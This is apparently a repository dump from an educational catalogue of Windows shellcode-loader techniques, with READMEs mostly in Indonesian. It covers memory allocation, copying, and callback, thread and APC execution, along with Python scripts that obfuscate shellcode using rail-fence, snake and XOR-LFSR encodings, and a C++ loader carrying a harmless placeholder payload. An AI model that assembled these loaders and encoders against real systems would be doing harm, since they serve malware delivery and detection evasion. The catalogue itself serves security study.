 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumResourceNames`.
 8 | 
 9 | Enumerasi resource types di dalam module dan eksekusi callback untuk memproses tiap resource type yang diidentifikasi.
10 | 
11 | ```c++
12 | BOOL EnumResourceNamesA (HMODULE hModule, LPCSTR lpType, ENUMRESNAMEPROCA lpEnumFunc, LONG_PTR lParam);
13 | 
14 | BOOL EnumResourceNamesW (HMODULE hModule, LPCWSTR lpType, ENUMRESNAMEPROCW lpEnumFunc, LONG_PTR lParam);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN EnumResourceNamesA](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesa)
20 | - [MSDN EnumResourceNamesW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesw)


--------------------------------------------------------------------------------
/windows/execution/thread/EtwpCreateEtwThread/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a thread.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EtwpCreateEtwThread` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`.
 8 | 
 9 | `EtwpCreateEtwThread` adalah fungsi internal dan bersifat low-level.
10 | 
11 | ```c++
12 | HANDLE EtwpCreateEtwThread (LPVOID routine, LPVOID param);
13 | 
14 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [NTInternals EtwpCreateEtwThread](https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm)
20 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)
21 | - [GIST TheWover](https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3)


--------------------------------------------------------------------------------
/windows/execution/callback/SetWinEventHook/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `SetWinEventHook`.
 8 | 
 9 | ```c++
10 | HWINEVENTHOOK SetWinEventHook(DWORD eventMin,DWORD eventMax,HMODULE hmodWinEventProc,WINEVENTPROC pfnWinEventProc,DWORD idProcess,DWORD idThread,DWORD dwFlags);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN SetWinEventHook](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwineventhook)
16 | - [MSDN GetMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getmessage)
17 | - [MSDN TranslateMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-translatemessage)
18 | - [MSDN DispatchMessage](https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-dispatchmessage)


--------------------------------------------------------------------------------
/windows/execution/event/NtQueueApcThread/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode by queueing into APC (Asynchronous Procedure Call).
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `NtQueueApcThread`.
 8 | 
 9 | ```c++
10 | NTSTATUS NtQueueApcThread (HANDLE ThreadHandle, PIO_APC_ROUTINE ApcRoutine, PVOID ApcRoutineContext, PIO_STATUS_BLOCK ApcStatusBlock, ULONG ApcReserved);
11 | 
12 | NTSTATUS NtTestAlert();
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN NtQueueApcThread](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtQueueApcThread.html)
18 | - [NTInternals NtTestAlert](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FAPC%2FNtTestAlert.html)
19 | - [BLOG APC Series: User APC API Low Level Pleasure](https://repnz.github.io/posts/apc/user-apc/)


--------------------------------------------------------------------------------
/windows/execution/callback/CryptDecodeMessage/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CryptDecodeMessage`.
 8 | 
 9 | ```c++
10 | BOOL CryptDecodeMessage (DWORD dwMsgTypeFlags, PCRYPT_DECRYPT_MESSAGE_PARA pDecryptPara, PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbEncodedBlob, DWORD cbEncodedBlob, DWORD dwPrevInnerContentType, DWORD *pdwMsgType, DWORD *pdwInnerContentType, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppXchgCert, PCCERT_CONTEXT *ppSignerCert);
11 | ```
12 | 
13 | ### Reference 
14 | 
15 | - [MSDN CryptDecodeMessage](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptdecodemessage)
16 | - [MSDN structure CRYPT_VERIFY_MESSAGE_PARA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/ns-wincrypt-crypt_verify_message_para)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceTypesEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumResourceTypesEx`.
 8 | 
 9 | Enumerasi resource types di dalam module dan eksekusi callback untuk memproses tiap resource type yang diidentifikasi.
10 | 
11 | ```c++
12 | BOOL EnumResourceTypesExA (HMODULE hModule, ENUMRESTYPEPROCA lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);
13 | 
14 | BOOL EnumResourceTypesExW (HMODULE hModule, ENUMRESTYPEPROCW lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN EnumResourceTypesExA](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-enumresourcetypesa)
20 | - [MSDN EnuMResourceTypesExW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcetypesexw)


--------------------------------------------------------------------------------
/windows/allocation/VirtualAlloc/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi dengan `VirtualAlloc` dan dealokasi dengan `VirtualFree`.
 8 | 
 9 | ```c++
10 | LPVOID VirtualAlloc (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
11 | 
12 | BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD  flNewProtect, PDWORD lpflOldProtect);
13 | 
14 | BOOL VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN VirtualAlloc](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc)
20 | - [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)
21 | - [MSDN VirtualFree](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfree)
22 | 


--------------------------------------------------------------------------------
/windows/execution/callback/DPA_EnumCallback/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `DPA_EnumCallback`.
 8 | 
 9 | ```c++
10 | void DPA_EnumCallback (HDPA hdpa, PFNDAENUMCALLBACK pfnCB, void *pData);
11 | 
12 | HDPA DPA_Create (int cItemGrow);
13 | 
14 | BOOL DPA_Destroy (HDPA hdpa);
15 | 
16 | int DPA_InsertPtr (HDPA hdpa, int i, void *p);
17 | ```
18 | 
19 | ### Reference 
20 | 
21 | - [MSDN DPA_EnumCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_enumcallback)
22 | - [MSDN DPA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_create)
23 | - [MSDN DPA_Destroy](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_destroy)
24 | - [MSDN DPA_InsertPtr](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dpa_insertptr)


--------------------------------------------------------------------------------
/windows/writing/permutation/rail-fence/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and 
 2 | # generate the encoded shellcode
 3 | 
 4 | import random
 5 | 
 6 | with open("shellcode.bin", "rb") as f:
 7 |     shcode = f.read()
 8 | shlen = len(shcode)
 9 | 
10 | # encode the shellcode
11 | key = random.randrange(2, 10)
12 | enc_shcode = [key] + [0 for c in range(shlen)]
13 | 
14 | p = 1
15 | s = [(key-1)*2, 0]
16 | 
17 | for i in range(0, key):
18 |     j = i 
19 |     idx = 0
20 | 
21 |     while j < shlen:
22 |         enc_shcode[p] = shcode[j]
23 | 
24 |         if s[idx] > 0:
25 |             j += s[idx]
26 |             p += 1
27 |         
28 |         idx = (idx + 1) & 1
29 |     
30 |     s[0] -= 2
31 |     s[1] += 2
32 | 
33 | # print as C-array
34 | print("{ ", end='')
35 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
36 | print(" }")
37 | print(f"Length: {len(enc_shcode)}")


--------------------------------------------------------------------------------
/windows/writing/custom/xor-lfsr/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and 
 2 | # generate the encoded shellcode
 3 | 
 4 | import random
 5 | 
 6 | with open("shellcode.bin", "rb") as f:
 7 |     shcode = f.read()
 8 | 
 9 | # generate single byte key
10 | seed = random.randrange(1, 255)
11 | 
12 | # xor-encrypt
13 | enc_shcode = [seed]
14 | 
15 | state = seed
16 | taps  = [8, 6, 5, 4]
17 | for c in shcode:
18 |     # generate value from LFSR 
19 |     feedback = 0
20 |     for tap in taps:
21 |         feedback ^= (state >> (tap - 1)) & 1
22 | 
23 |     feedback ^= (state ^ (state >> 3)) & 1
24 |     state = ((state << 1) | feedback) & 0xFF
25 | 
26 |     # XOR with shellcode byte
27 |     enc_shcode.append(c ^ state)
28 | 
29 | # print as C-array
30 | print("{ ", end='')
31 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
32 | print(" }")
33 | 
34 | print(f"Length: {len(enc_shcode)}")


--------------------------------------------------------------------------------
/windows/execution/callback/DSA_EnumCallback/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `DSA_EnumCallback`.
 8 | 
 9 | ```c++
10 | void DSA_EnumCallback (HDSA hdsa, PFNDAENUMCALLBACK pfnCB, void *pData);
11 | 
12 | HDSA DSA_Create (int cbItem, int cItemGrow);
13 | 
14 | BOOL DSA_Destroy (HDSA hdsa);
15 | 
16 | int DSA_InsertItem (HDSA hdsa, int i, const void *pitem);
17 | ```
18 | 
19 | ### Reference 
20 | 
21 | - [MSDN DSA_EnumCallback](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_enumcallback)
22 | - [MSDN DSA_Create](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_create)
23 | - [MSDN DSA_Destroy](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_destroy)
24 | - [MSDN DSA_InsertItem](https://docs.microsoft.com/en-us/windows/win32/api/dpa_dsa/nf-dpa_dsa-dsa_insertitem)


--------------------------------------------------------------------------------
/windows/execution/callback/EnumResourceNamesEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumResourceNamesEx`.
 8 | 
 9 | Enumerasi resource types di dalam module dan eksekusi callback untuk memproses tiap resource type yang diidentifikasi.
10 | 
11 | ```c++
12 | BOOL EnumResourceNamesExA (HMODULE hModule, LPCSTR lpType, ENUMRESNAMEPROCA lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);
13 | 
14 | BOOL EnumResourceNamesExW (HMODULE hModule, LPCWSTR lpType, ENUMRESNAMEPROCW lpEnumFunc, LONG_PTR lParam, DWORD dwFlags, LANGID LangId);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN EnumResourceNamesExA](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesexa)
20 | - [MSDN EnumResourceNamesExW](https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-enumresourcenamesexw)


--------------------------------------------------------------------------------
/windows/execution/callback/SendMessageCallback/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `SendMessageCallback`. Fungsi ini akan mengirimkan sebuah message ke window dan menjalankan callback apabila message diproses. Dengan memproses message secara manual, callback akan dipicu.
 8 | 
 9 | ```c++
10 | BOOL SendMessageCallbackA (HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam, SENDASYNCPROC lpResultCallBack, ULONG_PTR dwData);
11 | 
12 | BOOL SendMessageCallbackW (HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam, SENDASYNCPROC lpResultCallBack, ULONG_PTR dwData);
13 | ```
14 | 
15 | ### Reference 
16 | 
17 | - [MSDN SendMessageCallbackA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-sendmessagecallbacka)
18 | - [MSDN SendMessageCallbackW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-sendmessagecallbackw)


--------------------------------------------------------------------------------
/windows/allocation/GlobalAlloc-GHND/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `GlobalAlloc` dan dapatkan handle ke area yang telah dialokasikan. Alamat buffer diperoleh melalui `GlobalLock`.
 8 | 
 9 | ```c++
10 | HGLOBAL GlobalAlloc (UINT uFlags, SIZE_T dwBytes);
11 | 
12 | LPVOID GlobalLock (HGLOBAL hMem);
13 | 
14 | BOOL GlobalUnlock (HGLOBAL hMem);
15 | 
16 | HGLOBAL GlobalFree (HGLOBAL hMem);
17 | ```
18 | 
19 | ### Reference 
20 | 
21 | - [MSDN GlobalAlloc](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalalloc)
22 | - [MSDN GlobalLock](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globallock)
23 | - [MSDN GlobalUnlock](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalunlock)
24 | - [MSDN GlobalFree](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-globalfree)


--------------------------------------------------------------------------------
/windows/execution/event/RegisterWaitForSingleObject/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode using timer.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `RegisterWaitForSingleObject`.
 8 | 
 9 | ```c++
10 | BOOL RegisterWaitForSingleObject(PHANDLE phNewWaitObject, HANDLE hObject, WAITORTIMERCALLBACK Callback, PVOID Context, ULONG dwMilliseconds, ULONG dwFlags);
11 | 
12 | HANDLE CreateEventA(LPSECURITY_ATTRIBUTES lpEventAttributes, BOOL bManualReset, BOOL bInitialState, LPCSTR lpName);
13 | 
14 | BOOL UnregisterWait(HANDLE WaitHandle);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN RegisterWaitForSingleObject](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-registerwaitforsingleobject)
20 | - [MSDN CreateEventA](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-createeventa)
21 | - [MSDN UnregisterWait](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-unregisterwait)


--------------------------------------------------------------------------------
/windows/storage/section/c++/code.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 |     Shellcode Loader
 3 |     Archive of Reversing.ID
 4 | 
 5 |     storing payload as separate section
 6 | 
 7 | Compile:
 8 |     $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp
 9 | 
10 | Technique:
11 |     - allocation: VirtualAlloc
12 |     - writing:    n/a
13 |     - permission: VirtualProtect
14 |     - execution:  CreateThread
15 | */
16 | 
17 | #include <windows.h>
18 | #include <string.h>
19 | #include <stdint.h>
20 | 
21 | // create new executable section
22 | #pragma section(".code",execute,read)
23 | _declspec(allocate(".code")) 
24 | uint8_t payload[] = { 0x90, 0x90, 0xCC, 0xC3 };
25 | 
26 | 
27 | int main ()
28 | {
29 |     HANDLE  th_shellcode;
30 |     void *  runtime = payload;
31 | 
32 |     // execute shellcode directly from section
33 |     th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0);
34 |     WaitForSingleObject (th_shellcode, -1);
35 | 
36 |     return 0;
37 | }


--------------------------------------------------------------------------------
/windows/execution/callback/EnumDirTree/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `EnumDirTree`.
 8 | 
 9 | ```c++
10 | BOOL IMAGEAPI EnumDirTree (HANDLE hProcess, PCSTR RootPath, PCSTR InputPathName, PSTR OutputPathBuffer, PENUMDIRTREE_CALLBACK cb, PVOID data);
11 | 
12 | BOOL IMAGEAPI EnumDirTreeW (HANDLE hProcess, PCWSTR RootPath, PCWSTR InputPathName, PWSTR OutputPathBuffer, PENUMDIRTREE_CALLBACKW cb, PVOID data);
13 | 
14 | BOOL IMAGEAPI SymInitialize (HANDLE hProcess, PCSTR UserSearchPath, BOOL fInvadeProcess);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN EnumDirTree](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumdirtree)
20 | - [MSDN EnumDirTreeW](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumdirtreew)
21 | - [MSDN SymInitialize](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-syminitialize)


--------------------------------------------------------------------------------
/windows/allocation/VirtualAllocEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi dengan `VirtualAllocEx` dan dealokasi dengan `VirtualFreeEx`.
 8 | 
 9 | ```c++
10 | LPVOID VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD  flAllocationType, DWORD flProtect);
11 | 
12 | BOOL VirtualProtectEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD  flNewProtect, PDWORD lpflOldProtect);
13 | 
14 | BOOL VirtualFreeEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD  dwFreeType);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN VirtualAllocEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualallocex)
20 | - [MSDN VirtualProtectEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotectex)
21 | - [MSDN VirtualFreeEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfreeex)
22 | 


--------------------------------------------------------------------------------
/windows/execution/event/timeSetEvent/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode using timer.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `timeSetEvent`.
 8 | 
 9 | Fungsi ini tergolong obsolete.
10 | 
11 | ```c++
12 | MMRESULT timeSetEvent (UINT uDelay, UINT uResolution, LPTIMECALLBACK lpTimeProc, DWORD_PTR dwUser, UINT fuEvent);
13 | 
14 | MMRESULT timeKillEvent (uTimerID);
15 | 
16 | MMRESULT timeBeginPeriod (UINT uPeriod);
17 | 
18 | MMRESULT timeGetDevCaps (LPTIMECAPS ptc, UINT cbtc);
19 | ```
20 | 
21 | ### Reference 
22 | 
23 | - [MSDN timeSetEvent](https://docs.microsoft.com/en-us/previous-versions//dd757634(v=vs.85))
24 | - [MSDN timeKillEvent](https://docs.microsoft.com/en-us/previous-versions//dd757630(v=vs.85))
25 | - [MSDN timeGetDevCaps](https://docs.microsoft.com/en-us/windows/win32/api/timeapi/nf-timeapi-timegetdevcaps)
26 | - [MSDN timeBeginPeriod](https://docs.microsoft.com/en-us/windows/win32/api/timeapi/nf-timeapi-timebeginperiod)


--------------------------------------------------------------------------------
/windows/allocation/VirtualAlloc2/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi dengan `VirtualAlloc2` dan dealokasi dengan `VirtualFree`.
 8 | 
 9 | ```c++
10 | LPVOID VirtualAlloc2(HANDLE Process, PVOID BaseAddress, SIZE_T Size, ULONG AllocationType, ULONG PageProtection, MEM_EXTENDED_PARAMETER ExtendedParameters, ULONG ParameterCount);
11 | 
12 | BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD  flNewProtect, PDWORD lpflOldProtect);
13 | 
14 | BOOL VirtualFree(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN VirtualAlloc2](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc2)
20 | - [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect)
21 | - [MSDN VirtualFree](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualfree)
22 | 


--------------------------------------------------------------------------------
/windows/writing/permutation/snake/c++/generate.py:
--------------------------------------------------------------------------------
 1 | # read shellcode from `shellcode.bin` and 
 2 | # generate the encoded shellcode
 3 | 
 4 | import random
 5 | 
 6 | with open("shellcode.bin", "rb") as f:
 7 |     shcode = f.read()
 8 | shlen = len(shcode)
 9 | 
10 | # encode the shellcode
11 | # how many row?
12 | rows = random.randrange(2, 5)
13 | 
14 | remainder = shlen % rows
15 | if remainder > 0:
16 |     extra = (rows - remainder)
17 | 
18 |     shlen += extra
19 |     shcode += b"\x00" * extra    
20 | 
21 | cols = shlen // rows
22 | enc_shcode = [rows]
23 | 
24 | for r in range(0, rows):
25 |     start = r * cols 
26 |     end   = (r + 1) * cols
27 |     
28 |     shrow = shcode[start:end]
29 | 
30 |     if r % 2 == 1:
31 |         enc_shcode += shrow[::-1]
32 |     else:
33 |         enc_shcode += shrow
34 | 
35 | # print as C-array
36 | print("{ ", end='')
37 | print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
38 | print(" }")
39 | print(f"Length: {len(enc_shcode)}")


--------------------------------------------------------------------------------
/windows/execution/thread/CreateThreadpoolWork/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Abusing callback to run shellcode.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `CreateThreadpoolWork`, `SubmitThreadpoolWork`, dan `WaitForThreadpoolWorkCallbacks`.
 8 | 
 9 | ```c++
10 | PTP_WORK CreateThreadpoolWork(PTP_WORK_CALLBACK pfnwk, PVOID pv, PTP_CALLBACK_ENVIRON pcbe);
11 | 
12 | void SubmitThreadpoolWork(PTP_WORK pwk);
13 | 
14 | void WaitForThreadpoolWorkCallbacks(PTP_WORK pwk, BOOL fCancelPendingCallbacks);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [MSDN CreateThreadpoolWork](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpoolwork)
20 | - [MSDN SubmitThreadpoolWork](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-submitthreadpoolwork)
21 | - [MSDN WaitForThreadpoolWorkCallbacks](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-waitforthreadpoolworkcallbacks)


--------------------------------------------------------------------------------
/windows/execution/thread/NtCreateThreadEx/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Executing shellcode as a thread.
 4 | 
 5 | ### Overview
 6 | 
 7 | Eksekusi shellcode dengan `NtCreateThreadEx` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`.
 8 | 
 9 | `NtCreateThreadEx` adalah fungsi internal dan bersifat low-level.
10 | 
11 | ```c++
12 | NTSTATUS NtCreateThreadEx (PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes, HANDLE ProcessHandle, PVOID lpStartAddress, PVOID lpParameter, ULONG flags, SIZE_T szStackZeroBits, SIZE_T szStackCommitSize, SIZE_T szStackReserveSize, PVOID lpBytesBuffer);
13 | 
14 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
15 | ```
16 | 
17 | ### Reference 
18 | 
19 | - [NTInternals NtCreateThreadEx](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethreadex)
20 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)


--------------------------------------------------------------------------------
/windows/writing/copy/CreatePipe/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Writing shellcode to allocated memory.
 4 | 
 5 | ### Overview
 6 | 
 7 | Penyalinan shellcode menggunakan mekanisme pipe (`CreatePipe`, `WriteFile`, dan `ReadFile`).
 8 | 
 9 | ```c++
10 | BOOL CreatePipe (PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize);
11 | 
12 | BOOL WriteFile (HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped);
13 | 
14 | BOOL ReadFile (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped);
15 | ```
16 | 
17 | ### Reference
18 | 
19 | - [MSDN CreatePipe](https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-createpipe)
20 | - [MSDN WriteFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile)
21 | - [MSDN ReadFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfile)


--------------------------------------------------------------------------------
/windows/allocation/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | ### Overview
 4 | 
 5 | Teknik `allocation` digunakan untuk menciptakan ruang yang cukup untuk menampung shellcode yang telah diekstrak dari ruang penyimpanan (global/stack/resource/download). Memory yang telah dialokasikan haruslah ditandai sebagai executable. Hal ini dilakukan untuk menghindari adanya exception oleh DEP (Data Execution Prevention).
 6 | 
 7 | ### Catalog
 8 | 
 9 | Daftar teknik `allocation` yang diimplementasikan:
10 | 
11 | - [AllocADsMem](AllocADsMem)
12 | - [CoTaskMemAlloc](CoTaskMemAlloc)
13 | - [CreateFileMapping](CreateFileMapping)
14 | - [GlobalAlloc-GHND](GlobalAlloc-GHND)
15 | - [GlobalAlloc-GPTR](GlobalAlloc-GPTR)
16 | - [HeapAlloc](HeapAlloc)
17 | - [NtAllocateVirtualMemory](NtAllocateVirtualMemory)
18 | - [NtCreateSection](NtCreateSection)
19 | - [NtCreateSectionEx](NtCreateSectionEx)
20 | - [RtlAllocateHeap](RtlAllocateHeap)
21 | - [VirtualAlloc](VirtualAlloc)
22 | - [VirtualAlloc2](VirtualAlloc2)
23 | - [VirtualAllocEx](VirtualAllocEx)


--------------------------------------------------------------------------------
/windows/allocation/HeapAlloc/README.md:
--------------------------------------------------------------------------------
 1 | # Shellcode Loader
 2 | 
 3 | Allocate memory for executing shellcode later.
 4 | 
 5 | ### Overview
 6 | 
 7 | Alokasi menggunakan `HeapAlloc`. Namun, alokasi dilakukan pada segment heap terpisah dan tidak menggunakan Heap default.
 8 | 
 9 | ```c++
10 | LPVOID HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes);
11 | 
12 | HANDLE HeapCreate (DWORD flOptions, SIZE_T dwInitialSize, SIZE_T dwMaximumSize);
13 | 
14 | BOOL HeapFree (HANDLE hHeap, DWORD dwFlags, _Frees_ptr_opt_ LPVOID lpMem);
15 | 
16 | BOOL HeapDestroy (HANDLE hHeap);
17 | ```
18 | 
19 | ### Reference 
20 | 
21 | - [MSDN HeapAlloc](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapalloc)
